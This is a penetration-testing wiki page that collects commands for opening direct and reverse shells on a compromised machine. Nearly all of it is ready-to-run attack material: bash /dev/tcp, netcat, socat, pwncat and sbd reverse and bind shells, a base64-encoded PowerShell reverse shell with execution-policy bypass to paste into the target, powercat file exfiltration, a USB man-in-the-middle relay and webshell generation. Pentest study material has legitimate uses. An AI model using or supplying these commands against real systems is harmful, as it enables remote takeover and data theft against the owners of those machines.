Direct and reverse shells

Penetration Testing Wiki

Once we are able to execute code remotely using a known vulnerability, executing code from a SQL injection, or even through a RFI (Remote File Inclusion) it is extremely important to continue further with more advanced post-exploitation phases to be able to spawn a shell.

Direct shells are used when the compromised machine is directly reacheable from Internet and the firewall allows incoming traffic (INGRESS filtering) to that specific port.

We use reverse shells in most of the cases, because the compromised machine is sitting inside a LAN or it has several layers of security. One of the perks of reverse shells is that usually firewalls do not limit outgoing traffic (EGRESS filtering).

Classic methods to spawn remote shells

bash

How to trigger a bash reverse shell:

On attacker:

nc -nvv -lp 8080

On target:

bash -i >& /dev/tcp/$IP/8080 0>&1

netcat

How to trigger a netcat bindshell:

On target:

nc -nvvlp 8989 -e /bin/bash

On attacker:

nc -nvv $IP 8989

How to trigger a netcat reverse shell:

On attacker:

nc -nvvlp 8989 $IP

On target:

nc -nvv $IP 8989 -e /bin/bash
Ctrl^Z
stty raw -echo
fg
reset
  • To improve interactive shell (Method 2):
python -c 'import pty; pty.spawn("/bin/bash")'

socat

Syntax:

socat [options] address1 address2

Examples of address:

  • stdio
  • tcp4:localhost:1080
  • tcp4-listen:8080 = tcp-l:8080
  • udp4:host:2049
  • udp4-l:500
  • exec:/bin/ls,pty
  • socks:socks.local:$IP:80
  • proxy:proxy.local:$IP:443
  • ssl-l:443,cert=./server.pem
  • open:file.txt
  • create:newfile.txt
  • UDP4-DATAGRAM:255.255.255.255:9999,bind=:9999,range=192.168.0.0/24
  • TUN:192.168.1.2/24,iff-up=1

How to trigger a bindshell with Socat:

On target:

socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane

On attacker:

socat FILE:`tty`,raw,echo=0 TCP:$IP:1337

How to trigger a reverse shell with Socat:

On attacker:

socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0

On target:

socat TCP4:$IP:1337 EXEC:bash,pty,stderr,setsid,sigint,sane

pwncat

https://pwncat.readthedocs.io/en/latest/usage.html

https://github.com/cytopia/pwncat

pwncat -l 4444

Bind shell:

pwncat -l -e '/bin/bash' 8080 -k

Reverse shell:

pwncat -e '/bin/bash' example.com 4444 --reconn --recon-wait 1

Direct shell with mosh

Mosh allows resillient sessions for low signal or servers with intermittent connectivity.

mosh --ssh="ssh -p 2222" example.org

More info: https://mosh.org/#usage

How to trigger a direct or reverse shell with Msfvenom:

Learn how to spawn remote shells with Metasploit Msfvenom in Msfvenom Payloads Cheat Sheet.

How to trigger a direct or reverse shell with sbd:

Syntax:

connect (tcp): sbd [-options] host port
listen (tcp):  sbd -l -p port [-options]

Spawn a bindshell on port 4444 on target:

sbd -l -p 4444 -e bash -v -n

Connect to the bindshell from the attacker:

sbd 192.168.1.202 4444

Build a VPN with socat:

On server:

socat tcp-l:50500 TUN:192.168.10.2/24,iff-up=1

On client:

socat tcp:50500 TUN:192.168.10.3/24,iff-up=1

Windows Powershell Direct shell

$str='$client=New-Object System.Net.Sockets.TCPClient("'+$LHOST+'",'+$LPORT+');$stream= $client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data =(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String );$sendback2=$sendback+"PS "+(pwd).Path+"> ";$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$b=[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
echo "powershell -ep bypass -nop -encodedcommand $b" | clip

Then directly paste (Ctrl+V) in the target terminal.

USB man-in-the-middle

  • proxy USB over IP

Remote:

socat /dev/ttyUSB0,raw,echo=0 tcp-listen:1337,reuseaddr

Local:

socat PTY,raw,echo=0,link=/dev/ttyVUSB0 tcp:$TARGET:1337

tsh

Tiny SHell is an open-source UNIX backdoor (C language)

Powershell modules

Powercat

Powercat offers netcat functionality with powershell. No packages required. Good for data exfiltration.

In target:

powershell -exec bypass
Import-Module .\powercat.ps1
powercat -l 80 -i input.txt -c $IP

In attacker machine:

nc -vvlp 80 > input.txt

Reference: https://github.com/besimorhino/powercat

Webshells

Weevely

python weevely.py generate AbC /var/www/html/AbC.txt

Learn how to create webshells with Metasploit Msfvenom in Msfvenom payloads Cheat Sheet.